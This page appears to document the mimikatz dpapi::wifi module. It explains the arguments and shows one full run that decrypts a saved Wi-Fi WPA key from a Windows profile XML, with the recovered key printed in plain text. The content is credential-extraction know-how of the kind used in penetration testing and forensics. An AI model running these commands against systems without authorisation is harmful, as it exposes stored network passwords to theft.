wifi
dpapi::wifi decrypts saved Wi-Fi passwords. It has the following command line argument:
  • /in: The Wlan XML profile. The XML file's location is at C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{interface guid}*.xml
  • /password: the password to decrypt the Wi-Fi key
  • /masterkey: the masterkey to use for decryption. It can be obtained through sekurlsa::dpapi.
  • /unprotect: display the decryption results on screen
1
mimikatz # dpapi::wifi /in:"C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{F4257B8E-3599-4A6F-AEA2-B3B7646ECA80}\{25F4C906-099A-4871-826D-8A604C132954}.xml" /unprotect
2
Profile 'Timokleia'
3
​
4
* SSID name : Timokleia
5
* Authentication: WPAPSK
6
* Encryption : AES
7
​
8
**BLOB**
9
dwVersion : 00000001 - 1
10
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
11
dwMasterKeyVersion : 00000001 - 1
12
guidMasterKey : {f4bff6c3-18ee-435f-b27d-a68e5275389e}
13
dwFlags : 00000000 - 0 ()
14
dwDescriptionLen : 00000002 - 2
15
szDescription :
16
algCrypt : 00006610 - 26128 (CALG_AES_256)
17
dwAlgCryptLen : 00000100 - 256
18
dwSaltLen : 00000020 - 32
19
pbSalt : 4143ac5b363376ee3ad89cf5063ab321fa85df9019fc1cc1c0c440af61df1ea5
20
dwHmacKeyLen : 00000000 - 0
21
pbHmackKey :
22
algHash : 0000800e - 32782 (CALG_SHA_512)
23
dwAlgHashLen : 00000200 - 512
24
dwHmac2KeyLen : 00000020 - 32
25
pbHmack2Key : 69ff3dea262e96881bb300a790574c9703c2d21f1e950cd9d7cd8293a44c4923
26
dwDataLen : 00000010 - 16
27
pbData : e7596546caf68b275814b14bcfce78d0
28
dwSignLen : 00000040 - 64
29
pbSign : c5203a5844b9a00187b76769fadb20e923b502d593c78462c1fb8c5347247e2249772f989160f02a321b4f3c40d1d41dec18af0c417e5279d89728f359a1fde4
30
​
31
* using CryptUnprotectData API
32
* Key Material : SecureWPAPass
Copied!
Last modified 6mo ago
Copy link